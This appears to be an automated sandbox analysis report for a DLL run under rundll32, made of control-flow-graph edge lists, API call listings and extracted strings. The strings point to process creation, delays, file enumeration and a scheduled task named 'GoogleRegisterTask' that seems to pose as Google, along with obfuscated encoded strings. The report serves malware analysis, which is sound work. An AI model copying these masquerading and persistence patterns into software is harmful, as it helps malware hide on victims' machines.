15685 6f9ed9d2 __fread_nolock 15682->15685 15688 6f9ed9ef 15682->15688 15683 6f9ed9df 15684 6f9f0431 __dosmaperr 14 API calls 15683->15684 15686 6f9ed9e4 15684->15686 15685->15683 15685->15688 15693 6f9eda30 __fread_nolock 15685->15693 15687 6f9edef9 __wsopen_s 39 API calls 15686->15687 15687->15688 15695 6f9edc4b 15688->15695 15689 6f9edb5b __fread_nolock 15692 6f9f0431 __dosmaperr 14 API calls 15689->15692 15691 6f9eeea2 __fread_nolock 39 API calls 15691->15693 15692->15686 15693->15688 15693->15689 15693->15691 15698 6f9edc53 15693->15698 15712 6f9efe17 15693->15712 15805 6f9ecc91 RtlLeaveCriticalSection 15695->15805 15697 6f9edc51 15697->15669 15699 6f9edc64 15698->15699 15702 6f9edc60 __fread_nolock 15698->15702 15700 6f9edc6b 15699->15700 15704 6f9edc7e __fread_nolock 15699->15704 15701 6f9f0431 __dosmaperr 14 API calls 15700->15701 15703 6f9edc70 15701->15703 15702->15693 15705 6f9edef9 __wsopen_s 39 API calls 15703->15705 15704->15702 15706 6f9edcac 15704->15706 15708 6f9edcb5 15704->15708 15705->15702 15707 6f9f0431 __dosmaperr 14 API calls 15706->15707 15709 6f9edcb1 15707->15709 15708->15702 15710 6f9f0431 __dosmaperr 14 API calls 15708->15710 15711 6f9edef9 __wsopen_s 39 API calls 15709->15711 15710->15709 15711->15702 15713 6f9efe29 15712->15713 15714 6f9efe41 15712->15714 15716 6f9f041e __dosmaperr 14 API calls 15713->15716 15715 6f9f0183 15714->15715 15721 6f9efe84 15714->15721 15718 6f9f041e __dosmaperr 14 API calls 15715->15718 15717 6f9efe2e 15716->15717 15719 6f9f0431 __dosmaperr 14 API calls 15717->15719 15720 6f9f0188 15718->15720 15722 6f9efe36 15719->15722 15723 6f9f0431 __dosmaperr 14 API calls 15720->15723 15721->15722 15724 6f9efe8f 15721->15724 15730 6f9efebf 15721->15730 15722->15693 15725 6f9efe9c 15723->15725 15726 6f9f041e __dosmaperr 14 API calls 15724->15726 15728 6f9edef9 __wsopen_s 39 API calls 15725->15728 15727 6f9efe94 15726->15727 15729 6f9f0431 __dosmaperr 14 API calls 15727->15729 15728->15722 15729->15725 15731 6f9efed8 
15730->15731 15732 6f9efee5 15730->15732 15733 6f9eff13 15730->15733 15731->15732 15766 6f9eff01 15731->15766 15734 6f9f041e __dosmaperr 14 API calls 15732->15734 15736 6f9f047e __fread_nolock 15 API calls 15733->15736 15735 6f9efeea 15734->15735 15737 6f9f0431 __dosmaperr 14 API calls 15735->15737 15739 6f9eff24 15736->15739 15741 6f9efef1 15737->15741 15738 6f9f5a73 __fread_nolock 39 API calls 15742 6f9f005f 15738->15742 15740 6f9f0444 ___free_lconv_mon 14 API calls 15739->15740 15743 6f9eff2d 15740->15743 15744 6f9edef9 __wsopen_s 39 API calls 15741->15744 15745 6f9f00d3 15742->15745 15748 6f9f0078 GetConsoleMode 15742->15748 15746 6f9f0444 ___free_lconv_mon 14 API calls 15743->15746 15774 6f9efefc __fread_nolock 15744->15774 15747 6f9f00d7 ReadFile 15745->15747 15749 6f9eff34 15746->15749 15750 6f9f00ef 15747->15750 15751 6f9f014b GetLastError 15747->15751 15748->15745 15752 6f9f0089 15748->15752 15753 6f9eff3e 15749->15753 15754 6f9eff59 15749->15754 15750->15751 15757 6f9f00c8 15750->15757 15755 6f9f00af 15751->15755 15756 6f9f0158 15751->15756 15752->15747 15758 6f9f008f ReadConsoleW 15752->15758 15760 6f9f0431 __dosmaperr 14 API calls 15753->15760 15762 6f9ef0cf __fread_nolock 41 API calls 15754->15762 15755->15774 15775 6f9f03d7 15755->15775 15761 6f9f0431 __dosmaperr 14 API calls 15756->15761 15770 6f9f012b 15757->15770 15771 6f9f0114 15757->15771 15757->15774 15758->15757 15763 6f9f00a9 GetLastError 15758->15763 15759 6f9f0444 ___free_lconv_mon 14 API calls 15759->15722 15764 6f9eff43 15760->15764 15765 6f9f015d 15761->15765 15762->15766 15763->15755 15768 6f9f041e __dosmaperr 14 API calls 15764->15768 15769 6f9f041e __dosmaperr 14 API calls 15765->15769 15766->15738 15768->15774 15769->15774 15770->15774 15793 6f9ef96f 15770->15793 15780 6f9efb29 15771->15780 15774->15759 15776 6f9f041e __dosmaperr 14 API calls 15775->15776 15777 6f9f03e2 __dosmaperr 15776->15777 15778 6f9f0431 __dosmaperr 14 API calls 15777->15778 15779 6f9f03f5 15778->15779 
15779->15774 15799 6f9ef822 15780->15799 15782 6f9f488b __fread_nolock MultiByteToWideChar 15784 6f9efc3d 15782->15784 15787 6f9efc46 GetLastError 15784->15787 15790 6f9efb71 15784->15790 15785 6f9efbcb 15791 6f9efb85 15785->15791 15792 6f9ef0cf __fread_nolock 41 API calls 15785->15792 15786 6f9efbbb 15788 6f9f0431 __dosmaperr 14 API calls 15786->15788 15789 6f9f03d7 __dosmaperr 14 API calls 15787->15789 15788->15790 15789->15790 15790->15774 15791->15782 15792->15791 15795 6f9ef9a9 15793->15795 15794 6f9efa3a 15794->15774 15795->15794 15796 6f9efa3f ReadFile 15795->15796 15796->15794 15797 6f9efa5c 15796->15797 15797->15794 15798 6f9ef0cf __fread_nolock 41 API calls 15797->15798 15798->15794 15800 6f9ef856 15799->15800 15801 6f9ef8c7 ReadFile 15800->15801 15802 6f9ef8c2 15800->15802 15801->15802 15803 6f9ef8e0 15801->15803 15802->15785 15802->15786 15802->15790 15802->15791 15803->15802 15804 6f9ef0cf __fread_nolock 41 API calls 15803->15804 15804->15802 15805->15697 15807 6f9ec37b __vfwprintf_l 39 API calls 15806->15807 15811 6f9ec801 15807->15811 15808 6f9ec849 15809 6f9ec86e 15808->15809 15812 6f9ec320 __vfwprintf_l 39 API calls 15808->15812 15822 6f9ecab6 15809->15822 15810 6f9ec816 15814 6f9ede7c __vfwprintf_l 29 API calls 15810->15814 15811->15808 15811->15810 15821 6f9ec831 __DllMainCRTStartup@12 15811->15821 15812->15809 15814->15821 15815 6f9ecab6 __DllMainCRTStartup@12 42 API calls 15816 6f9ec883 15815->15816 15816->15815 15817 6f9ec8ac 15816->15817 15818 6f9ec2c5 __vfwprintf_l 39 API calls 15817->15818 15820 6f9ec937 __aulldiv __DllMainCRTStartup@12 15817->15820 15818->15820 15819 6f9ec2c5 __vfwprintf_l 39 API calls 15819->15821 15820->15819 15821->15397 15823 6f9ecac2 15822->15823 15827 6f9ecad8 15822->15827 15829 6f9f14e7 15823->15829 15825 6f9ecacd __vfwprintf_l 15825->15816 15826 6f9ecae8 15826->15816 15827->15826 15834 6f9f158d 15827->15834 15841 6f9ef497 GetLastError 15829->15841 15872 6f9f150b 15834->15872 15836 6f9f15ba 15839 6f9e4ad5 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15836->15839 15840 6f9f1656 15839->15840 15840->15826 15842 6f9ef4ad 15841->15842 15843 6f9ef4b3 15841->15843 15845 6f9f1930 __dosmaperr 6 API calls 15842->15845 15844 6f9f196f __dosmaperr 6 API calls 15843->15844 15847 6f9ef4b7 SetLastError 15843->15847 15846 6f9ef4cf 15844->15846 15845->15843 15846->15847 15849 6f9f1658 __dosmaperr 14 API calls 15846->15849 15851 6f9ef54c 15847->15851 15852 6f9ef547 15847->15852 15850 6f9ef4e4 15849->15850 15853 6f9ef4ec 15850->15853 15854 6f9ef4fd 15850->15854 15855 6f9eed44 __FrameHandler3::FrameUnwindToState 37 API calls 15851->15855 15868 6f9f04cc 15852->15868 15856 6f9f196f __dosmaperr 6 API calls 15853->15856 15857 6f9f196f __dosmaperr 6 API calls 15854->15857 15858 6f9ef551 15855->15858 15859 6f9ef4fa 15856->15859 15860 6f9ef509 15857->15860 15864 6f9f0444 ___free_lconv_mon 14 API calls 15859->15864 15861 6f9ef50d 15860->15861 15862 6f9ef524 15860->15862 15863 6f9f196f __dosmaperr 6 API calls 15861->15863 15865 6f9ef299 __dosmaperr 14 API calls 15862->15865 15863->15859 15864->15847 15866 6f9ef52f 15865->15866 15867 6f9f0444 ___free_lconv_mon 14 API calls 15866->15867 15867->15847 15869 6f9f04df 15868->15869 15870 6f9f04f4 15868->15870 15869->15870 15871 6f9f5611 __vfwprintf_l 39 API calls 15869->15871 15870->15825 15871->15870 15873 6f9f1529 15872->15873 15879 6f9f1522 15872->15879 15874 6f9ef497 _unexpected 39 API calls 15873->15874 15873->15879 15875 6f9f154a 15874->15875 15876 6f9f04cc __DllMainCRTStartup@12 39 API calls 15875->15876 15877 6f9f1560 15876->15877 15895 6f9f052a 15877->15895 15879->15836 15880 6f9f5952 15879->15880 15881 6f9f150b __DllMainCRTStartup@12 39 API calls 15880->15881 15882 6f9f5972 15881->15882 15883 6f9f488b __fread_nolock MultiByteToWideChar 15882->15883 15886 6f9f599f 15883->15886 15884 6f9f5a2e 15887 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15884->15887 15885 6f9f5a26 15899 6f9f5a53 
15885->15899 15886->15884 15886->15885 15889 6f9f047e __fread_nolock 15 API calls 15886->15889 15891 6f9f59c4 __fread_nolock __alloca_probe_16 15886->15891 15890 6f9f5a51 15887->15890 15889->15891 15890->15836 15891->15885 15892 6f9f488b __fread_nolock MultiByteToWideChar 15891->15892 15893 6f9f5a0d 15892->15893 15893->15885 15894 6f9f5a14 GetStringTypeW 15893->15894 15894->15885 15896 6f9f053d 15895->15896 15897 6f9f0552 15895->15897 15896->15897 15898 6f9f455a __vfwprintf_l 39 API calls 15896->15898 15897->15879 15898->15897 15900 6f9f5a5f 15899->15900 15901 6f9f5a70 15899->15901 15900->15901 15902 6f9f0444 ___free_lconv_mon 14 API calls 15900->15902 15901->15884 15902->15901 15904 6f9ed2cf 15903->15904 15909 6f9ed2f7 15903->15909 15905 6f9ed2fe 15904->15905 15906 6f9ed2dc 15904->15906 15904->15909 15911 6f9ed21a 15905->15911 15907 6f9ede7c __vfwprintf_l 29 API calls 15906->15907 15907->15909 15909->15403 15940->14189 15941 6f9e4e89 15942 6f9e4e97 15941->15942 15943 6f9e4e92 15941->15943 15947 6f9e4d53 15942->15947 15962 6f9e508a 15943->15962 15948 6f9e4d5f ___scrt_is_nonwritable_in_current_image 15947->15948 15949 6f9e4d88 dllmain_raw 15948->15949 15950 6f9e4d83 15948->15950 15959 6f9e4d6e 15948->15959 15951 6f9e4da2 dllmain_crt_dispatch 15949->15951 15949->15959 15966 6f9e1000 15950->15966 15951->15950 15951->15959 15963 6f9e50a0 15962->15963 15965 6f9e50a9 15963->15965 16061 6f9e503d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 15963->16061 15965->15942 15967 6f9e1012 15966->15967 15968 6f9e1010 15966->15968 15971 6f9e4402 15967->15971 15972 6f9e4430 __fread_nolock 15971->15972 16017 6f9e171f 15972->16017 15975 6f9e1135 __DllMainCRTStartup@12 44 API calls 15976 6f9e4456 __DllMainCRTStartup@12 _strlen 15975->15976 15977 6f9e1075 __DllMainCRTStartup@12 43 API calls 15976->15977 15978 6f9e44ae 15977->15978 15979 6f9ed5ab ___std_exception_destroy 14 API calls 15978->15979 15980 6f9e44b9 GetEnvironmentVariableW 15979->15980 
15981 6f9e1135 __DllMainCRTStartup@12 44 API calls 15980->15981 15982 6f9e44e6 __DllMainCRTStartup@12 _strlen 15981->15982 15983 6f9e1075 __DllMainCRTStartup@12 43 API calls 15982->15983 15984 6f9e4545 15983->15984 15985 6f9ed5ab ___std_exception_destroy 14 API calls 15984->15985 15986 6f9e4550 15985->15986 15987 6f9e1135 __DllMainCRTStartup@12 44 API calls 15986->15987 15988 6f9e4567 __DllMainCRTStartup@12 _strlen 15987->15988 15989 6f9e1075 __DllMainCRTStartup@12 43 API calls 15988->15989 15990 6f9e45bc 15989->15990 15991 6f9ed5ab ___std_exception_destroy 14 API calls 15990->15991 15992 6f9e45c7 15991->15992 15993 6f9e1135 __DllMainCRTStartup@12 44 API calls 15992->15993 15994 6f9e45de __DllMainCRTStartup@12 _strlen 15993->15994 15995 6f9e1075 __DllMainCRTStartup@12 43 API calls 15994->15995 15996 6f9e4636 15995->15996 15997 6f9ed5ab ___std_exception_destroy 14 API calls 15996->15997 15998 6f9e4641 15997->15998 16037 6f9e192f 15998->16037 16001 6f9e1135 __DllMainCRTStartup@12 44 API calls 16002 6f9e467b __DllMainCRTStartup@12 _strlen 16001->16002 16003 6f9e1075 __DllMainCRTStartup@12 43 API calls 16002->16003 16004 6f9e46da 16003->16004 16005 6f9ed5ab ___std_exception_destroy 14 API calls 16004->16005 16006 6f9e46e5 16005->16006 16007 6f9e1135 __DllMainCRTStartup@12 44 API calls 16006->16007 16008 6f9e46fc __DllMainCRTStartup@12 _strlen 16007->16008 16009 6f9e1075 __DllMainCRTStartup@12 43 API calls 16008->16009 16010 6f9e4758 16009->16010 16011 6f9ed5ab ___std_exception_destroy 14 API calls 16010->16011 16012 6f9e4763 16011->16012 16013 6f9e1b85 __DllMainCRTStartup@12 120 API calls 16012->16013 16014 6f9e4782 16013->16014 16059 6f9e6180 16017->16059 16020 6f9e1135 __DllMainCRTStartup@12 44 API calls 16022 6f9e1775 __DllMainCRTStartup@12 _strlen 16020->16022 16021 6f9e17d8 GetProcAddress 16023 6f9ed5ab ___std_exception_destroy 14 API calls 16021->16023 16022->16021 16024 6f9e17f5 16023->16024 16025 6f9e1135 __DllMainCRTStartup@12 44 API calls 16024->16025 16027 
6f9e1806 __DllMainCRTStartup@12 _strlen 16025->16027 16026 6f9e1869 GetProcAddress 16028 6f9ed5ab ___std_exception_destroy 14 API calls 16026->16028 16027->16026 16029 6f9e1886 16028->16029 16030 6f9e1135 __DllMainCRTStartup@12 44 API calls 16029->16030 16032 6f9e1897 __DllMainCRTStartup@12 _strlen 16030->16032 16031 6f9e18fa GetProcAddress 16033 6f9ed5ab ___std_exception_destroy 14 API calls 16031->16033 16032->16031 16034 6f9e1917 16033->16034 16035 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16034->16035 16036 6f9e1927 16035->16036 16036->15975 16038 6f9e1957 __fread_nolock 16037->16038 16039 6f9e1135 __DllMainCRTStartup@12 44 API calls 16038->16039 16040 6f9e19b3 __DllMainCRTStartup@12 _strlen 16039->16040 16041 6f9e1075 __DllMainCRTStartup@12 43 API calls 16040->16041 16042 6f9e1a0b 16041->16042 16043 6f9ed5ab ___std_exception_destroy 14 API calls 16042->16043 16044 6f9e1a16 16043->16044 16045 6f9e1075 __DllMainCRTStartup@12 43 API calls 16044->16045 16046 6f9e1a3a CreateProcessW 16045->16046 16047 6f9e1a68 16046->16047 16049 6f9e1a6f __fread_nolock 16046->16049 16048 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16047->16048 16050 6f9e1b7d Sleep Sleep 16048->16050 16051 6f9e1135 __DllMainCRTStartup@12 44 API calls 16049->16051 16050->16001 16052 6f9e1aba __DllMainCRTStartup@12 _strlen 16051->16052 16053 6f9e1075 __DllMainCRTStartup@12 43 API calls 16052->16053 16054 6f9e1b0f 16053->16054 16055 6f9ed5ab ___std_exception_destroy 14 API calls 16054->16055 16056 6f9e1b1a 16055->16056 16057 6f9e1075 __DllMainCRTStartup@12 43 API calls 16056->16057 16058 6f9e1b3c CreateProcessW 16057->16058 16058->16047 16060 6f9e174a GetModuleHandleW 16059->16060 16060->16020 16061->15965 16859 6f9e4b49 16860 6f9e4b87 16859->16860 16861 6f9e4b54 16859->16861 16898 6f9e4ca3 16860->16898 16863 6f9e4b79 16861->16863 16864 6f9e4b59 16861->16864 16884 6f9e4b9c 16863->16884 16866 6f9e4b5e 16864->16866 16867 6f9e4b6f 
16864->16867 16870 6f9e4b63 16866->16870 16871 6f9e51de 16866->16871 16876 6f9e51bf 16867->16876 16925 6f9eecbe 16871->16925 17009 6f9e671c 16876->17009 16879 6f9e51c8 16879->16870 16882 6f9e51db 16882->16870 16883 6f9e6727 21 API calls 16883->16879 16885 6f9e4ba8 ___scrt_is_nonwritable_in_current_image 16884->16885 17015 6f9e524f 16885->17015 16887 6f9e4baf __DllMainCRTStartup@12 16888 6f9e4c9b 16887->16888 16889 6f9e4bd6 16887->16889 16895 6f9e4c12 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 16887->16895 17031 6f9e53ee IsProcessorFeaturePresent 16888->17031 17023 6f9e51b1 16889->17023 16892 6f9e4ca2 16893 6f9e4be5 __RTC_Initialize 16893->16895 17026 6f9e50d5 RtlInitializeSListHead 16893->17026 16895->16870 16896 6f9e4bf3 16896->16895 17027 6f9e5186 16896->17027 16899 6f9e4caf ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 16898->16899 16900 6f9e4d4b 16899->16900 16901 6f9e4ce0 16899->16901 16917 6f9e4cb8 16899->16917 16902 6f9e53ee __DllMainCRTStartup@12 4 API calls 16900->16902 17075 6f9e521f 16901->17075 16906 6f9e4d52 ___scrt_is_nonwritable_in_current_image 16902->16906 16904 6f9e4ce5 17084 6f9e50e1 16904->17084 16908 6f9e4d88 dllmain_raw 16906->16908 16909 6f9e4d83 16906->16909 16922 6f9e4d6e 16906->16922 16907 6f9e4cea __RTC_Initialize __DllMainCRTStartup@12 17087 6f9e53c0 16907->17087 16910 6f9e4da2 dllmain_crt_dispatch 16908->16910 16908->16922 16912 6f9e1000 __DllMainCRTStartup@12 130 API calls 16909->16912 16910->16909 16910->16922 16914 6f9e4dc3 16912->16914 16916 6f9e4df4 16914->16916 16919 6f9e1000 __DllMainCRTStartup@12 130 API calls 16914->16919 16918 6f9e4dfd dllmain_crt_dispatch 16916->16918 16916->16922 16917->16870 16920 6f9e4e10 dllmain_raw 16918->16920 16918->16922 16921 6f9e4ddb 16919->16921 16920->16922 16923 6f9e4ca3 __DllMainCRTStartup@12 145 API calls 16921->16923 16922->16870 16924 6f9e4de9 dllmain_raw 16923->16924 16924->16916 16931 6f9ef46b 16925->16931 16928 6f9e6727 16997 6f9e676a 
16928->16997 16932 6f9e51e3 16931->16932 16933 6f9ef475 16931->16933 16932->16928 16934 6f9f1930 __dosmaperr 6 API calls 16933->16934 16935 6f9ef47c 16934->16935 16935->16932 16936 6f9f196f __dosmaperr 6 API calls 16935->16936 16937 6f9ef48f 16936->16937 16939 6f9ef332 16937->16939 16940 6f9ef34d 16939->16940 16941 6f9ef33d 16939->16941 16940->16932 16945 6f9ef353 16941->16945 16944 6f9f0444 ___free_lconv_mon 14 API calls 16944->16940 16946 6f9ef368 16945->16946 16947 6f9ef36e 16945->16947 16949 6f9f0444 ___free_lconv_mon 14 API calls 16946->16949 16948 6f9f0444 ___free_lconv_mon 14 API calls 16947->16948 16950 6f9ef37a 16948->16950 16949->16947 16951 6f9f0444 ___free_lconv_mon 14 API calls 16950->16951 16952 6f9ef385 16951->16952 16953 6f9f0444 ___free_lconv_mon 14 API calls 16952->16953 16954 6f9ef390 16953->16954 16955 6f9f0444 ___free_lconv_mon 14 API calls 16954->16955 16956 6f9ef39b 16955->16956 16957 6f9f0444 ___free_lconv_mon 14 API calls 16956->16957 16958 6f9ef3a6 16957->16958 16959 6f9f0444 ___free_lconv_mon 14 API calls 16958->16959 16960 6f9ef3b1 16959->16960 16961 6f9f0444 ___free_lconv_mon 14 API calls 16960->16961 16962 6f9ef3bc 16961->16962 16963 6f9f0444 ___free_lconv_mon 14 API calls 16962->16963 16964 6f9ef3c7 16963->16964 16965 6f9f0444 ___free_lconv_mon 14 API calls 16964->16965 16966 6f9ef3d5 16965->16966 16971 6f9ef17f 16966->16971 16972 6f9ef18b ___scrt_is_nonwritable_in_current_image 16971->16972 16987 6f9f351f RtlEnterCriticalSection 16972->16987 16975 6f9ef195 16977 6f9f0444 ___free_lconv_mon 14 API calls 16975->16977 16978 6f9ef1bf 16975->16978 16977->16978 16988 6f9ef1de 16978->16988 16979 6f9ef1ea 16980 6f9ef1f6 ___scrt_is_nonwritable_in_current_image 16979->16980 16992 6f9f351f RtlEnterCriticalSection 16980->16992 16982 6f9ef200 16983 6f9ef420 __dosmaperr 14 API calls 16982->16983 16984 6f9ef213 16983->16984 16993 6f9ef233 16984->16993 16987->16975 16991 6f9f3567 RtlLeaveCriticalSection 16988->16991 16990 6f9ef1cc 16990->16979 
16991->16990 16992->16982 16996 6f9f3567 RtlLeaveCriticalSection 16993->16996 16995 6f9ef221 16995->16944 16996->16995 16998 6f9e51e8 16997->16998 16999 6f9e6774 16997->16999 16998->16870 17000 6f9e7973 ___vcrt_FlsGetValue 6 API calls 16999->17000 17001 6f9e677b 17000->17001 17002 6f9e79ae ___vcrt_FlsSetValue 6 API calls 17001->17002 17003 6f9e678a 17002->17003 17005 6f9e674e 17003->17005 17006 6f9e6758 17005->17006 17007 6f9e6765 17005->17007 17006->17007 17008 6f9ed5ab ___std_exception_destroy 14 API calls 17006->17008 17007->16998 17008->17007 17010 6f9e67a3 __FrameHandler3::FrameUnwindToState 23 API calls 17009->17010 17011 6f9e51c4 17010->17011 17011->16879 17012 6f9eecb3 17011->17012 17013 6f9ef5e8 __dosmaperr 14 API calls 17012->17013 17014 6f9e51d0 17013->17014 17014->16882 17014->16883 17016 6f9e5258 17015->17016 17035 6f9e55eb IsProcessorFeaturePresent 17016->17035 17020 6f9e5269 17021 6f9e526d 17020->17021 17022 6f9e672f ___scrt_uninitialize_crt 7 API calls 17020->17022 17021->16887 17022->17021 17069 6f9e5288 17023->17069 17025 6f9e51b8 17025->16893 17026->16896 17028 6f9e518b ___scrt_release_startup_lock 17027->17028 17029 6f9e55eb IsProcessorFeaturePresent 17028->17029 17030 6f9e5194 17028->17030 17029->17030 17030->16895 17032 6f9e5404 __fread_nolock __FrameHandler3::FrameUnwindToState 17031->17032 17033 6f9e54af IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17032->17033 17034 6f9e54f3 __FrameHandler3::FrameUnwindToState 17033->17034 17034->16892 17036 6f9e5264 17035->17036 17037 6f9e66fd 17036->17037 17045 6f9e77a7 17037->17045 17040 6f9e6706 17040->17020 17042 6f9e670e 17043 6f9e6719 17042->17043 17044 6f9e77e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 17042->17044 17043->17020 17044->17040 17046 6f9e77b0 17045->17046 17048 6f9e77d9 17046->17048 17049 6f9e6702 17046->17049 17059 6f9e79ec 17046->17059 17050 6f9e77e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 17048->17050 17049->17040 17051 6f9e6835 
                Control-flow Graph: edge list continued from the preceding function (omitted; named calls include ___vcrt_FlsSetValue, ___vcrt_uninitialize_ptd, InitializeCriticalSectionAndSpinCount, TlsAlloc, __DllMainCRTStartup@12, RtlInterlockedFlushSList, RtlEnterCriticalSection, RtlLeaveCriticalSection, __vfwprintf_l, __fread_nolock, __dosmaperr, __wsopen_s, FlushFileBuffers, GetLastError)

                Control-flow Graph

                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,B5FBC098), ref: 6F9E1C0B
                • _strlen.LIBCMT ref: 6F9E1D30
                • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6F9E1D9D
                • FindNextFileW.KERNELBASE(?,?,?,?,?,B5FBC098), ref: 6F9E1FAC
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: FileFind$EnvironmentExpandFirstNextStrings_strlen
                • String ID: %s\%s$%s\%s$%s\%s$%s\*.*$-a $GoogleRegisterTask$IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7BbtB>$PT30S$s`bovb-f{f
                • API String ID: 4146766196-3364674013
                • Opcode ID: d4e5a124c581805b333b48add5c211a7b2f9aacf73cec254da13c2a77a5f89e4
                • Instruction ID: e1b6d3ef3083582703a11bd80efeb5b3cf546df129010e3ae0f48a47c7ba7a34
                • Opcode Fuzzy Hash: d4e5a124c581805b333b48add5c211a7b2f9aacf73cec254da13c2a77a5f89e4
                • Instruction Fuzzy Hash: C6C1AEB1804249ABDF21DFA4DC49FED3BB8BF16318F50842AF904DA1D2EB35D6958B50

                Control-flow Graph

                APIs
                  • Part of subcall function 6F9E171F: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6F9E175A
                  • Part of subcall function 6F9E171F: _strlen.LIBCMT ref: 6F9E177C
                  • Part of subcall function 6F9E171F: GetProcAddress.KERNEL32(?), ref: 6F9E17E2
                  • Part of subcall function 6F9E171F: _strlen.LIBCMT ref: 6F9E180D
                • _strlen.LIBCMT ref: 6F9E4460
                • GetEnvironmentVariableW.KERNEL32(?,?,00000032), ref: 6F9E44CA
                • _strlen.LIBCMT ref: 6F9E44F0
                • _strlen.LIBCMT ref: 6F9E4571
                • _strlen.LIBCMT ref: 6F9E45E8
                  • Part of subcall function 6F9E192F: _strlen.LIBCMT ref: 6F9E19BD
                  • Part of subcall function 6F9E192F: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA074C4), ref: 6F9E1A5E
                • Sleep.KERNELBASE(000005DC), ref: 6F9E4654
                • Sleep.KERNELBASE(00007530), ref: 6F9E465F
                • _strlen.LIBCMT ref: 6F9E4685
                • _strlen.LIBCMT ref: 6F9E4706
                  • Part of subcall function 6F9E1B85: FindFirstFileW.KERNELBASE(?,?,?,?,?,B5FBC098), ref: 6F9E1C0B
                Strings
                • %s%s, xrefs: 6F9E4745
                • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6F9E46E6
                • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6F9E4665
                • VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>, xrefs: 6F9E4551
                • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6F9E4440
                • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB, xrefs: 6F9E44D0
                • %s%s, xrefs: 6F9E46C4
                • %s%s, xrefs: 6F9E452F
                • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB, xrefs: 6F9E45C8
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: _strlen$Sleep$AddressCreateEnvironmentFileFindFirstHandleModuleProcProcessVariable
